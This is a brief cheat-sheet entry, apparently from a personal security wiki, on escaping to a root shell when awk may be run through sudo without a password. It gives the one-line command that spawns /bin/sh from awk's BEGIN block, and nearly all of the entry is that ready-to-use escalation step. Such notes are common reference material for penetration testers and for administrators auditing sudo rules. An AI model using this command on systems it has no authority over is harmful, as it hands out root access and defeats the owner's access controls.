# awk If awk can be [[sudo|run with NOPASSWD via sudo]], then you can use the following to break out into a root shell: ```bash sudo awk 'BEGIN {system("/bin/sh")}' ```